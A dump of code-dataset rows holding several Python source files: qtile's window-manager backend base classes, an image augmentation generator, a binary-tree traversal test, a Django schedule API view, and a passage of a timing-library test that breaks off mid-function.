hexsha stringlengths 40 40 | size int64 1 1.03M | ext stringclasses 10
values | lang stringclasses 1
value | max_stars_repo_path stringlengths 3 239 | max_stars_repo_name stringlengths 5 130 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 3 239 | max_issues_repo_name stringlengths 5 130 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 67k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 3 239 | max_forks_repo_name stringlengths 5 130 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 1 1.03M | avg_line_length float64 1 958k | max_line_length int64 1 1.03M | alphanum_fraction float64 0 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
795b8bb32f8e6bed3554493539946f65276bd359 | 18,517 | py | Python | libqtile/backend/base.py | ep12/qtile | 67f97604d9535c35eea459d7261adb4ece0980f8 | [
"MIT"
] | null | null | null | libqtile/backend/base.py | ep12/qtile | 67f97604d9535c35eea459d7261adb4ece0980f8 | [
"MIT"
] | null | null | null | libqtile/backend/base.py | ep12/qtile | 67f97604d9535c35eea459d7261adb4ece0980f8 | [
"MIT"
] | null | null | null | from __future__ import annotations
import contextlib
import enum
import math
import typing
from abc import ABCMeta, abstractmethod
import cairocffi
from libqtile import drawer, pangocffi, utils
from libqtile.command.base import CommandObject
if typing.TYPE_CHECKING:
from typing import Any, Dict, List, Optional, Tuple, Union
from libqtile import config
from libqtile.command.base import ItemT
from libqtile.core.manager import Qtile
from libqtile.group import _Group
from libqtile.utils import ColorType
class Core(metaclass=ABCMeta):
painter: Any
@property
@abstractmethod
def name(self) -> str:
"""The name of the backend"""
pass
@abstractmethod
def finalize(self):
"""Destructor/Clean up resources"""
@property
@abstractmethod
def display_name(self) -> str:
pass
@abstractmethod
def setup_listener(self, qtile: Qtile) -> None:
"""Setup a listener for the given qtile instance"""
@abstractmethod
def remove_listener(self) -> None:
    """Remove the listener previously installed by setup_listener"""
def update_desktops(self, groups: List[_Group], index: int) -> None:
"""Set the current desktops of the window manager"""
@abstractmethod
def get_screen_info(self) -> List[Tuple[int, int, int, int]]:
"""Get the screen information"""
@abstractmethod
def grab_key(self, key: Union[config.Key, config.KeyChord]) -> Tuple[int, int]:
"""Configure the backend to grab the key event"""
@abstractmethod
def ungrab_key(self, key: Union[config.Key, config.KeyChord]) -> Tuple[int, int]:
"""Release the given key event"""
@abstractmethod
def ungrab_keys(self) -> None:
"""Release the grabbed key events"""
@abstractmethod
def grab_button(self, mouse: config.Mouse) -> int:
"""Configure the backend to grab the mouse event"""
@abstractmethod
def ungrab_buttons(self) -> None:
"""Release the grabbed button events"""
@abstractmethod
def grab_pointer(self) -> None:
"""Configure the backend to grab mouse events"""
@abstractmethod
def ungrab_pointer(self) -> None:
"""Release grabbed pointer events"""
def scan(self) -> None:
"""Scan for clients if required."""
def warp_pointer(self, x: int, y: int) -> None:
"""Warp the pointer to the given coordinates relative."""
def update_client_list(self, windows_map: Dict[int, WindowType]) -> None:
"""Update the list of windows being managed"""
@contextlib.contextmanager
def masked(self):
"""A context manager to suppress window events while operating on many windows."""
yield
def create_internal(self, x: int, y: int, width: int, height: int) -> Internal:
"""Create an internal window controlled by Qtile."""
raise NotImplementedError # Only error when called, not when instantiating class
def flush(self) -> None:
"""If needed, flush the backend's event queue."""
def graceful_shutdown(self):
"""Try to close windows gracefully before exiting"""
def simulate_keypress(self, modifiers: List[str], key: str) -> None:
"""Simulate a keypress with given modifiers"""
def change_vt(self, vt: int) -> bool:
"""Change virtual terminal, returning success."""
return False
@enum.unique
class FloatStates(enum.Enum):
    """The floating-related layout states a window can be in."""
    NOT_FLOATING = 1
    FLOATING = 2
    MAXIMIZED = 3
    FULLSCREEN = 4
    TOP = 5
    MINIMIZED = 6
class _Window(CommandObject, metaclass=ABCMeta):
def __init__(self):
self.borderwidth: int = 0
self.name: str = "<no name>"
self.reserved_space: Optional[Tuple[int, int, int, int]] = None
self.defunct: bool = False
@property
@abstractmethod
def group(self) -> Optional[_Group]:
"""The group to which this window belongs."""
@property
@abstractmethod
def wid(self) -> int:
"""The unique window ID"""
@abstractmethod
def hide(self) -> None:
"""Hide the window"""
@abstractmethod
def unhide(self) -> None:
"""Unhide the window"""
@abstractmethod
def kill(self) -> None:
"""Kill the window"""
def get_wm_class(self) -> Optional[List]:
"""Return the class(es) of the window"""
return None
def get_wm_type(self) -> Optional[str]:
"""Return the type of the window"""
return None
def get_wm_role(self) -> Optional[str]:
"""Return the role of the window"""
return None
@property
def can_steal_focus(self):
"""Is it OK for this window to steal focus?"""
return True
def has_fixed_ratio(self) -> bool:
"""Does this window want a fixed aspect ratio?"""
return False
def has_fixed_size(self) -> bool:
"""Does this window want a fixed size?"""
return False
@property
def urgent(self):
"""Whether this window urgently wants focus"""
return False
@abstractmethod
def place(self, x, y, width, height, borderwidth, bordercolor,
above=False, margin=None, respect_hints=False):
"""Place the window in the given position."""
def _items(self, name: str) -> ItemT:
return None
def _select(self, name, sel):
return None
def info(self) -> Dict[str, Any]:
"""Return information on this window."""
return {}
class Window(_Window, metaclass=ABCMeta):
"""A regular Window belonging to a client."""
def __repr__(self):
return "Window(name=%r, wid=%i)" % (self.name, self.wid)
@property
def floating(self) -> bool:
"""Whether this window is floating."""
return False
@property
def maximized(self) -> bool:
"""Whether this window is maximized."""
return False
@property
def fullscreen(self) -> bool:
"""Whether this window is fullscreened."""
return False
@property
def wants_to_fullscreen(self) -> bool:
"""Does this window want to be fullscreen?"""
return False
def match(self, match: config.Match) -> bool:
"""Compare this window against a Match instance."""
return match.compare(self)
@abstractmethod
def focus(self, warp: bool) -> None:
"""Focus this window and optional warp the pointer to it."""
@abstractmethod
def togroup(
self, group_name: Optional[str] = None, *, switch_group: bool = False
) -> None:
"""Move window to a specified group
Also switch to that group if switch_group is True.
"""
@property
def has_focus(self):
return self == self.qtile.current_window
def has_user_set_position(self) -> bool:
"""Whether this window has user-defined geometry"""
return False
def is_transient_for(self) -> Optional["WindowType"]:
    """Return the window this window is a transient window for, if any."""
    return None
@abstractmethod
def get_pid(self) -> int:
"""Return the PID that owns the window."""
def paint_borders(self, color, width) -> None:
"""Paint the window borders with the given color and width"""
@abstractmethod
def cmd_focus(self, warp: Optional[bool] = None) -> None:
"""Focuses the window."""
@abstractmethod
def cmd_info(self) -> Dict:
"""Return a dictionary of info."""
@abstractmethod
def cmd_get_position(self) -> Tuple[int, int]:
"""Get the (x, y) of the window"""
@abstractmethod
def cmd_get_size(self) -> Tuple[int, int]:
"""Get the (width, height) of the window"""
@abstractmethod
def cmd_move_floating(self, dx: int, dy: int) -> None:
"""Move window by dx and dy"""
@abstractmethod
def cmd_resize_floating(self, dw: int, dh: int) -> None:
"""Add dw and dh to size of window"""
@abstractmethod
def cmd_set_position_floating(self, x: int, y: int) -> None:
"""Move window to x and y"""
@abstractmethod
def cmd_set_size_floating(self, w: int, h: int) -> None:
"""Set window dimensions to w and h"""
@abstractmethod
def cmd_place(self, x, y, width, height, borderwidth, bordercolor,
above=False, margin=None) -> None:
"""Place the window with the given position and geometry."""
@abstractmethod
def cmd_toggle_floating(self) -> None:
"""Toggle the floating state of the window."""
@abstractmethod
def cmd_enable_floating(self) -> None:
"""Float the window."""
@abstractmethod
def cmd_disable_floating(self) -> None:
"""Tile the window."""
@abstractmethod
def cmd_toggle_maximize(self) -> None:
    """Toggle the maximized state of the window."""
@abstractmethod
def cmd_toggle_fullscreen(self) -> None:
"""Toggle the fullscreen state of the window."""
@abstractmethod
def cmd_enable_fullscreen(self) -> None:
"""Fullscreen the window"""
@abstractmethod
def cmd_disable_fullscreen(self) -> None:
"""Un-fullscreen the window"""
@abstractmethod
def cmd_bring_to_front(self) -> None:
"""Bring the window to the front"""
def cmd_togroup(
self, group_name: Optional[str] = None, *, switch_group: bool = False
) -> None:
"""Move window to a specified group
Also switch to that group if switch_group is True.
"""
self.togroup(group_name, switch_group=switch_group)
def cmd_opacity(self, opacity):
    """Set the window's opacity, clamped to the range [0.1, 1]."""
    # 0.1 is the floor so the window never becomes completely invisible.
    self.opacity = max(.1, min(1, opacity))
def cmd_down_opacity(self):
    """Decrease the window's opacity by 0.1, bottoming out at 0.1."""
    # don't go completely clear
    self.opacity = self.opacity - .1 if self.opacity > .2 else .1
def cmd_up_opacity(self):
    """Increase the window's opacity by 0.1, capping at fully opaque."""
    self.opacity = self.opacity + .1 if self.opacity < .9 else 1
@abstractmethod
def cmd_kill(self) -> None:
"""Kill the window. Try to be polite."""
class Internal(_Window, metaclass=ABCMeta):
"""An Internal window belonging to Qtile."""
def __repr__(self):
return "Internal(wid=%s)" % self.wid
@abstractmethod
def create_drawer(self, width: int, height: int) -> Drawer:
"""Create a Drawer that draws to this window."""
def process_window_expose(self) -> None:
"""Respond to the window being exposed. Required by X11 backend."""
def process_button_click(self, x: int, y: int, button: int) -> None:
"""Handle a pointer button click."""
def process_button_release(self, x: int, y: int, button: int) -> None:
"""Handle a pointer button release."""
def process_pointer_enter(self, x: int, y: int) -> None:
"""Handle the pointer entering the window."""
def process_pointer_leave(self, x: int, y: int) -> None:
"""Handle the pointer leaving the window."""
def process_pointer_motion(self, x: int, y: int) -> None:
"""Handle pointer motion within the window."""
class Static(_Window, metaclass=ABCMeta):
"""A Window not bound to a single Group."""
screen: config.Screen
def __repr__(self):
return "Static(name=%r, wid=%s)" % (self.name, self.wid)
WindowType = typing.Union[Window, Internal, Static]
class Drawer:
"""A helper class for drawing to Internal windows.
We stage drawing operations locally in memory using a cairo RecordingSurface before
finally drawing all operations to a backend-specific target.
"""
def __init__(self, qtile: Qtile, win: Internal, width: int, height: int):
self.qtile = qtile
self._win = win
self._width = width
self._height = height
self.surface: cairocffi.RecordingSurface
self.ctx: cairocffi.Context
self._reset_surface()
self.clear((0, 0, 1))
def finalize(self):
"""Destructor/Clean up resources"""
self.surface = None
self.ctx = None
@property
def width(self) -> int:
return self._width
@width.setter
def width(self, width: int):
self._width = width
@property
def height(self) -> int:
return self._height
@height.setter
def height(self, height: int):
self._height = height
def _reset_surface(self):
"""This creates a fresh surface and cairo context."""
self.surface = cairocffi.RecordingSurface(
cairocffi.CONTENT_COLOR_ALPHA,
None,
)
self.ctx = self.new_ctx()
def paint_to(self, drawer: Drawer) -> None:
"""Paint to another Drawer instance"""
def _rounded_rect(self, x, y, width, height, linewidth):
    """Trace a rounded-rectangle path on the context.

    Only builds the path; the caller is expected to stroke() or fill() it.
    """
    aspect = 1.0
    # Corner radius scales with the rectangle's height.
    corner_radius = height / 10.0
    radius = corner_radius / aspect
    degrees = math.pi / 180.0
    self.ctx.new_sub_path()
    # Inset the arc centres by half the line width so a subsequent stroke
    # stays within the requested bounds.
    delta = radius + linewidth / 2
    # Four 90-degree arcs: top-right, bottom-right, bottom-left, top-left.
    self.ctx.arc(x + width - delta, y + delta, radius,
                 -90 * degrees, 0 * degrees)
    self.ctx.arc(x + width - delta, y + height - delta,
                 radius, 0 * degrees, 90 * degrees)
    self.ctx.arc(x + delta, y + height - delta, radius,
                 90 * degrees, 180 * degrees)
    self.ctx.arc(x + delta, y + delta, radius,
                 180 * degrees, 270 * degrees)
    self.ctx.close_path()
def rounded_rectangle(self, x: int, y: int, width: int, height: int, linewidth: int):
self._rounded_rect(x, y, width, height, linewidth)
self.ctx.set_line_width(linewidth)
self.ctx.stroke()
def rounded_fillrect(self, x: int, y: int, width: int, height: int, linewidth: int):
self._rounded_rect(x, y, width, height, linewidth)
self.ctx.fill()
def rectangle(self, x: int, y: int, width: int, height: int, linewidth: int = 2):
self.ctx.set_line_width(linewidth)
self.ctx.rectangle(x, y, width, height)
self.ctx.stroke()
def fillrect(self, x: int, y: int, width: int, height: int, linewidth: int = 2):
self.ctx.set_line_width(linewidth)
self.ctx.rectangle(x, y, width, height)
self.ctx.fill()
self.ctx.stroke()
def draw(
self,
offsetx: int = 0,
offsety: int = 0,
width: Optional[int] = None,
height: Optional[int] = None,
):
"""
This draws our cached operations to the Internal window.
Parameters
==========
offsetx :
the X offset to start drawing at.
offsety :
the Y offset to start drawing at.
width :
the X portion of the canvas to draw at the starting point.
height :
the Y portion of the canvas to draw at the starting point.
"""
def new_ctx(self):
return pangocffi.patch_cairo_context(cairocffi.Context(self.surface))
def set_source_rgb(self, colour: ColorType):
    """Set the cairo source colour.

    A single colour spec sets a solid source; a list of two or more specs
    builds a vertical linear gradient spanning the drawer's height.

    Parameters
    ==========
    colour :
        a colour understood by ``utils.rgb``, or a list of such colours.
    """
    # isinstance (rather than type(...) == list) also accepts list subclasses
    if isinstance(colour, list):
        if len(colour) == 0:
            # defaults to black
            self.ctx.set_source_rgba(*utils.rgb("#000000"))
        elif len(colour) == 1:
            self.ctx.set_source_rgba(*utils.rgb(colour[0]))
        else:
            linear = cairocffi.LinearGradient(0.0, 0.0, 0.0, self.height)
            step_size = 1.0 / (len(colour) - 1)
            step = 0.0
            for c in colour:
                rgb_col = utils.rgb(c)
                if len(rgb_col) < 4:
                    # Append an opaque alpha channel; indexing rgb_col[3]
                    # on a 3-component colour would raise IndexError.
                    rgb_col = (*rgb_col, 1)
                linear.add_color_stop_rgba(step, *rgb_col)
                step += step_size
            self.ctx.set_source(linear)
    else:
        self.ctx.set_source_rgba(*utils.rgb(colour))
def clear(self, colour):
self.set_source_rgb(colour)
self.ctx.rectangle(0, 0, self.width, self.height)
self.ctx.fill()
self.ctx.stroke()
def textlayout(
self, text, colour, font_family, font_size, font_shadow, markup=False, **kw
):
"""Get a text layout"""
textlayout = drawer.TextLayout(
self, text, colour, font_family, font_size, font_shadow, markup=markup, **kw
)
return textlayout
def max_layout_size(self, texts, font_family, font_size):
sizelayout = self.textlayout("", "ffffff", font_family, font_size, None)
widths, heights = [], []
for i in texts:
sizelayout.text = i
widths.append(sizelayout.width)
heights.append(sizelayout.height)
return max(widths), max(heights)
def text_extents(self, text):
return self.ctx.text_extents(utils.scrub_to_utf8(text))
def font_extents(self):
return self.ctx.font_extents()
def fit_fontsize(self, heightlimit):
"""Try to find a maximum font size that fits any strings within the height"""
self.ctx.set_font_size(heightlimit)
asc, desc, height, _, _ = self.font_extents()
self.ctx.set_font_size(
int(heightlimit * heightlimit / height))
return self.font_extents()
def fit_text(self, strings, heightlimit):
"""Try to find a maximum font size that fits all strings within the height"""
self.ctx.set_font_size(heightlimit)
_, _, _, maxheight, _, _ = self.ctx.text_extents("".join(strings))
if not maxheight:
return 0, 0
self.ctx.set_font_size(
int(heightlimit * heightlimit / maxheight))
maxwidth, maxheight = 0, 0
for i in strings:
_, _, x, y, _, _ = self.ctx.text_extents(i)
maxwidth = max(maxwidth, x)
maxheight = max(maxheight, y)
return maxwidth, maxheight
def draw_vbar(self, color, x, y1, y2, linewidth=1):
self.set_source_rgb(color)
self.ctx.move_to(x, y1)
self.ctx.line_to(x, y2)
self.ctx.set_line_width(linewidth)
self.ctx.stroke()
def draw_hbar(self, color, x1, x2, y, linewidth=1):
self.set_source_rgb(color)
self.ctx.move_to(x1, y)
self.ctx.line_to(x2, y)
self.ctx.set_line_width(linewidth)
self.ctx.stroke()
| 30.306056 | 90 | 0.604688 |
795b8d55bd5f2826e7067585e8e2ab9c10e823c1 | 10,394 | py | Python | src/utils/data_augmentation.py | gourav287/Gender-Emotion-Recognition | d6f19310270fd5d107db333439a0b942c8b41d66 | [
"MIT"
] | 1 | 2021-07-05T09:32:34.000Z | 2021-07-05T09:32:34.000Z | src/utils/data_augmentation.py | gourav287/Gender-Emotion-Recognition | d6f19310270fd5d107db333439a0b942c8b41d66 | [
"MIT"
] | null | null | null | src/utils/data_augmentation.py | gourav287/Gender-Emotion-Recognition | d6f19310270fd5d107db333439a0b942c8b41d66 | [
"MIT"
] | 1 | 2021-05-12T05:12:04.000Z | 2021-05-12T05:12:04.000Z | import numpy as np
from random import shuffle
from .preprocessor import preprocess_input
from .preprocessor import _imread as imread
from .preprocessor import _imresize as imresize
from .preprocessor import to_categorical
import scipy.ndimage as ndi
import cv2
class ImageGenerator(object):
""" Image generator with saturation, brightness, lighting, contrast,
horizontal flip and vertical flip transformations. It supports
bounding boxes coordinates.
TODO:
- Finish support for not using bounding_boxes
- Random crop
- Test other transformations
"""
def __init__(self, ground_truth_data, batch_size, image_size,
train_keys, validation_keys,
ground_truth_transformer=None,
path_prefix=None,
saturation_var=0.5,
brightness_var=0.5,
contrast_var=0.5,
lighting_std=0.5,
horizontal_flip_probability=0.5,
vertical_flip_probability=0.5,
do_random_crop=False,
grayscale=False,
zoom_range=[0.75, 1.25],
translation_factor=.3):
self.ground_truth_data = ground_truth_data
self.ground_truth_transformer = ground_truth_transformer
self.batch_size = batch_size
self.path_prefix = path_prefix
self.train_keys = train_keys
self.validation_keys = validation_keys
self.image_size = image_size
self.grayscale = grayscale
self.color_jitter = []
if saturation_var:
self.saturation_var = saturation_var
self.color_jitter.append(self.saturation)
if brightness_var:
self.brightness_var = brightness_var
self.color_jitter.append(self.brightness)
if contrast_var:
self.contrast_var = contrast_var
self.color_jitter.append(self.contrast)
self.lighting_std = lighting_std
self.horizontal_flip_probability = horizontal_flip_probability
self.vertical_flip_probability = vertical_flip_probability
self.do_random_crop = do_random_crop
self.zoom_range = zoom_range
self.translation_factor = translation_factor
def _do_random_crop(self, image_array):
    """IMPORTANT: random crop only works for classification since the
    current implementation does no transform bounding boxes"""
    height = image_array.shape[0]
    width = image_array.shape[1]
    # random translation, bounded by translation_factor times each dimension
    x_offset = np.random.uniform(0, self.translation_factor * width)
    y_offset = np.random.uniform(0, self.translation_factor * height)
    offset = np.array([x_offset, y_offset])
    # random zoom factor; the same factor is applied to both axes so the
    # aspect ratio is preserved
    scale_factor = np.random.uniform(self.zoom_range[0],
                                     self.zoom_range[1])
    crop_matrix = np.array([[scale_factor, 0],
                            [0, scale_factor]])
    # move channels to the front so each channel is transformed separately
    image_array = np.rollaxis(image_array, axis=-1, start=0)
    # NOTE(review): ndi.interpolation.affine_transform is the legacy scipy
    # namespace — presumably pinned to an old scipy; verify before upgrading
    image_channel = [ndi.interpolation.affine_transform(image_channel,
        crop_matrix, offset=offset, order=0, mode='nearest',
        cval=0.0) for image_channel in image_array]
    image_array = np.stack(image_channel, axis=0)
    # restore channels-last layout
    image_array = np.rollaxis(image_array, 0, 3)
    return image_array
def do_random_rotation(self, image_array):
    """IMPORTANT: random rotation only works for classification since the
    current implementation does no transform bounding boxes"""
    # NOTE(review): this method is an exact copy of _do_random_crop — it
    # zooms/translates but never rotates. Confirm whether a rotation matrix
    # was intended here.
    height = image_array.shape[0]
    width = image_array.shape[1]
    x_offset = np.random.uniform(0, self.translation_factor * width)
    y_offset = np.random.uniform(0, self.translation_factor * height)
    offset = np.array([x_offset, y_offset])
    scale_factor = np.random.uniform(self.zoom_range[0],
                                     self.zoom_range[1])
    # scale-only affine matrix; no rotation term is present
    crop_matrix = np.array([[scale_factor, 0],
                            [0, scale_factor]])
    image_array = np.rollaxis(image_array, axis=-1, start=0)
    image_channel = [ndi.interpolation.affine_transform(image_channel,
        crop_matrix, offset=offset, order=0, mode='nearest',
        cval=0.0) for image_channel in image_array]
    image_array = np.stack(image_channel, axis=0)
    image_array = np.rollaxis(image_array, 0, 3)
    return image_array
def _gray_scale(self, image_array):
return image_array.dot([0.299, 0.587, 0.114])
def saturation(self, image_array):
gray_scale = self._gray_scale(image_array)
alpha = 2.0 * np.random.random() * self.brightness_var
alpha = alpha + 1 - self.saturation_var
image_array = (alpha * image_array + (1 - alpha) *
gray_scale[:, :, None])
return np.clip(image_array, 0, 255)
def brightness(self, image_array):
alpha = 2 * np.random.random() * self.brightness_var
alpha = alpha + 1 - self.saturation_var
image_array = alpha * image_array
return np.clip(image_array, 0, 255)
def contrast(self, image_array):
gray_scale = (self._gray_scale(image_array).mean() *
np.ones_like(image_array))
alpha = 2 * np.random.random() * self.contrast_var
alpha = alpha + 1 - self.contrast_var
image_array = image_array * alpha + (1 - alpha) * gray_scale
return np.clip(image_array, 0, 255)
def lighting(self, image_array):
covariance_matrix = np.cov(image_array.reshape(-1, 3) /
255.0, rowvar=False)
eigen_values, eigen_vectors = np.linalg.eigh(covariance_matrix)
noise = np.random.randn(3) * self.lighting_std
noise = eigen_vectors.dot(eigen_values * noise) * 255
image_array = image_array + noise
return np.clip(image_array, 0, 255)
def horizontal_flip(self, image_array, box_corners=None):
if np.random.random() < self.horizontal_flip_probability:
image_array = image_array[:, ::-1]
if box_corners is not None:
box_corners[:, [0, 2]] = 1 - box_corners[:, [2, 0]]
return image_array, box_corners
def vertical_flip(self, image_array, box_corners=None):
if (np.random.random() < self.vertical_flip_probability):
image_array = image_array[::-1]
if box_corners is not None:
box_corners[:, [1, 3]] = 1 - box_corners[:, [3, 1]]
return image_array, box_corners
def transform(self, image_array, box_corners=None):
shuffle(self.color_jitter)
for jitter in self.color_jitter:
image_array = jitter(image_array)
if self.lighting_std:
image_array = self.lighting(image_array)
if self.horizontal_flip_probability > 0:
image_array, box_corners = self.horizontal_flip(image_array,
box_corners)
if self.vertical_flip_probability > 0:
image_array, box_corners = self.vertical_flip(image_array,
box_corners)
return image_array, box_corners
def preprocess_images(self, image_array):
return preprocess_input(image_array)
def flow(self, mode='train'):
while True:
if mode == 'train':
shuffle(self.train_keys)
keys = self.train_keys
elif mode == 'val' or mode == 'demo':
shuffle(self.validation_keys)
keys = self.validation_keys
else:
raise Exception('invalid mode: %s' % mode)
inputs = []
targets = []
for key in keys:
image_path = self.path_prefix + key
image_array = imread(image_path)
image_array = imresize(image_array, self.image_size)
num_image_channels = len(image_array.shape)
if num_image_channels != 3:
continue
ground_truth = self.ground_truth_data[key]
'''if self.do_random_crop:
image_array = self._do_random_crop(image_array)'''
image_array = image_array.astype('float32')
if mode == 'train' or mode == 'demo':
if self.ground_truth_transformer is not None:
image_array, ground_truth = self.transform(
image_array,
ground_truth)
ground_truth = (
self.ground_truth_transformer.assign_boxes(
ground_truth))
else:
image_array = self.transform(image_array)[0]
if self.grayscale:
image_array = cv2.cvtColor(
image_array.astype('uint8'),
cv2.COLOR_RGB2GRAY).astype('float32')
image_array = np.expand_dims(image_array, -1)
inputs.append(image_array)
targets.append(ground_truth)
if len(targets) == self.batch_size:
inputs = np.asarray(inputs)
targets = np.asarray(targets)
# this will not work for boxes
targets = to_categorical(targets)
if mode == 'train' or mode == 'val':
inputs = self.preprocess_images(inputs)
yield self._wrap_in_dictionary(inputs, targets)
if mode == 'demo':
yield self._wrap_in_dictionary(inputs, targets)
inputs = []
targets = []
def _wrap_in_dictionary(self, image_array, targets):
return [{'input_1': image_array},
{'predictions': targets}]
| 43.48954 | 77 | 0.564941 |
795b8da854ab86fa605d82236c70e3dbcf2c0bce | 728 | py | Python | code-challenges-401/tree/test_breadth_first.py | arensdj/data-structures-and-algorithms | 8f965a147b4e02f88dbf9b9b01f805221e0a738a | [
"MIT"
] | null | null | null | code-challenges-401/tree/test_breadth_first.py | arensdj/data-structures-and-algorithms | 8f965a147b4e02f88dbf9b9b01f805221e0a738a | [
"MIT"
] | null | null | null | code-challenges-401/tree/test_breadth_first.py | arensdj/data-structures-and-algorithms | 8f965a147b4e02f88dbf9b9b01f805221e0a738a | [
"MIT"
] | null | null | null | from tree import BinarySearchTree
def test_preorder_traversal():
    """Pre-order traversal visits root, then left subtree, then right subtree."""
    tree = BinarySearchTree()
    tree.add(25)
    tree.add(15)
    tree.add(35)
    tree.add(8)
    tree.add(19)
    tree.add(30)
    tree.add(45)
    expected = [25, 15, 8, 19, 35, 30, 45]
    # (removed a dead "result = []" assignment that was immediately overwritten)
    result = tree.get_pre_order_data()
    assert result == expected
def test_breadth_order_traversal():
    """Breadth-first traversal visits nodes level by level, left to right."""
    tree = BinarySearchTree()
    tree.add(25)
    tree.add(15)
    tree.add(35)
    tree.add(8)
    tree.add(19)
    tree.add(30)
    tree.add(45)
    expected = [25, 15, 35, 8, 19, 30, 45]
    # (removed a dead "result = []" assignment and commented-out code)
    result = tree.get_breadth_order_data()
    assert result == expected
| 19.675676 | 61 | 0.622253 |
795b8e4ebb50e0343f2a6950b3473624eddc4790 | 3,754 | py | Python | schedule/views.py | yuking11/schedule-cms-server | 9c7bb56aa5251e91e05d4ec49eb4fc70f661ba3e | [
"MIT"
] | null | null | null | schedule/views.py | yuking11/schedule-cms-server | 9c7bb56aa5251e91e05d4ec49eb4fc70f661ba3e | [
"MIT"
] | null | null | null | schedule/views.py | yuking11/schedule-cms-server | 9c7bb56aa5251e91e05d4ec49eb4fc70f661ba3e | [
"MIT"
] | null | null | null | from django.shortcuts import render
from .models import Schedule
from .serializers import ScheduleSerializer
from rest_framework import generics
from rest_framework.views import APIView
from rest_framework.response import Response
from datetime import datetime, date, timedelta
from dateutil.relativedelta import relativedelta
from drf_yasg.utils import swagger_auto_schema
from drf_yasg import openapi
class ScheduleView(generics.ListCreateAPIView):
# class ScheduleView(APIView):
"""スケジュール管理API"""
queryset = Schedule.objects.all()
serializer_class = ScheduleSerializer
def get_queryset(self):
    """Filter schedules by the optional ``limit``/``year``/``month``/``day``
    query parameters and return them ordered by event date."""
    queryset = Schedule.objects.all()
    # Query parameters arrive as strings (or None); coerce to int when present.
    limit = self.request.GET.get('limit')
    limit = int(limit) if limit is not None else limit
    year = self.request.GET.get('year')
    year = int(year) if year is not None else year
    month = self.request.GET.get('month')
    month = int(month) if month is not None else month
    day = self.request.GET.get('day')
    day = int(day) if day is not None else day
    today = date.today()
    if limit is not None:
        # With a limit, build an inclusive [start_date, end_date] window whose
        # unit (days, months or years) depends on which components were given.
        if year is not None and month is not None and day is not None:
            start_date = datetime(year, month, day)
            end_date = start_date + timedelta(days=limit-1)
            queryset = queryset.filter(event_date__date__range=(start_date, end_date))
        elif year is not None and month is not None:
            start_date = datetime(year, month, 1)
            end_date = start_date + relativedelta(months=limit, days=-1)
            queryset = queryset.filter(event_date__date__range=(start_date, end_date))
        elif day is not None:
            # A bare day is interpreted within the current year and month.
            start_date = datetime(today.year, today.month, day)
            end_date = start_date + timedelta(days=limit-1)
            queryset = queryset.filter(event_date__date__range=(start_date, end_date))
        elif month is not None:
            # A bare month is interpreted within the current year.
            start_date = datetime(today.year, month, 1)
            end_date = start_date + relativedelta(months=limit, days=-1)
            queryset = queryset.filter(event_date__date__range=(start_date, end_date))
        elif year is not None:
            start_date = datetime(year, 1, 1)
            end_date = start_date + relativedelta(years=limit, days=-1)
            queryset = queryset.filter(event_date__date__range=(start_date, end_date))
    else:
        # Without a limit, filter by exact calendar components; the year
        # defaults to the current year when not supplied.
        if year is not None:
            queryset = queryset.filter(event_date__year=year)
        else:
            queryset = queryset.filter(event_date__year=today.year)
        if month is not None:
            queryset = queryset.filter(event_date__month=month)
        if day is not None:
            queryset = queryset.filter(event_date__day=day)
    return queryset.order_by('event_date')
limit_param = openapi.Parameter(
'limit', openapi.IN_QUERY, description='取得件数', type=openapi.TYPE_NUMBER
)
year_param = openapi.Parameter(
'year', openapi.IN_QUERY, description='開催年', type=openapi.TYPE_NUMBER
)
month_param = openapi.Parameter(
'month', openapi.IN_QUERY, description='開催月', type=openapi.TYPE_NUMBER
)
day_param = openapi.Parameter(
'day', openapi.IN_QUERY, description='開催日付', type=openapi.TYPE_NUMBER
)
@swagger_auto_schema(manual_parameters=[limit_param, year_param, month_param, day_param])
def get(self, request, *args, **kwargs):
return self.list(request, *args, **kwargs)
class ScheduleDetailView(generics.RetrieveUpdateDestroyAPIView):
    """Schedule management API: retrieve, update or delete a single schedule."""
    queryset = Schedule.objects.all()
    serializer_class = ScheduleSerializer
| 42.179775 | 93 | 0.658764 |
795b8efa3b3f2a8216416847a6168ffe12a0aaad | 5,079 | py | Python | test/test_clocked.py | JesseBuesking/clocked | cc7967031c0d4b5685fbbf636180a694364bcff4 | [
"MIT"
] | 2 | 2015-01-07T06:21:34.000Z | 2016-05-30T03:12:38.000Z | test/test_clocked.py | JesseBuesking/clocked | cc7967031c0d4b5685fbbf636180a694364bcff4 | [
"MIT"
] | null | null | null | test/test_clocked.py | JesseBuesking/clocked | cc7967031c0d4b5685fbbf636180a694364bcff4 | [
"MIT"
] | null | null | null | """ Tests for Clocked. """
from time import sleep
import unittest
# noinspection PyDocstring
from clocked.clockit import Clocked
from clocked.decorators import clocked
class TestClocked(unittest.TestCase):
def _assert(self, mini, val, maxi):
self.assertTrue(
mini <= val <= maxi,
'{} <= {} <= {} is not true'.format(
mini,
val,
maxi
)
)
def ten_ms(self):
sleep(.01)
# def template(self):
# Clocked.initialize('template')
# # time stuff
# with Clocked('a'):
# # time something
# pass
# # print report
# Profiler.print_hotspot_report()
def test_raw_simple(self):
""" Simple raw test using Clocked object. """
Clocked.initialize('test raw simple')
with Clocked('loop 1'):
for i in range(4):
with Clocked('loop 2'):
for j in range(2):
with Clocked('loop 3'):
for j in range(2):
self.ten_ms()
for j in range(2):
with Clocked('loop 4'):
for j in range(2):
self.ten_ms()
expected_total_time = 320
delta_upper_bound = 10
Clocked.verbose_report()
Clocked.hotspot_report()
print('')
total = 0.0
for timing in Clocked.get('loop 3'):
total += timing.duration_milliseconds
d = delta_upper_bound / 2
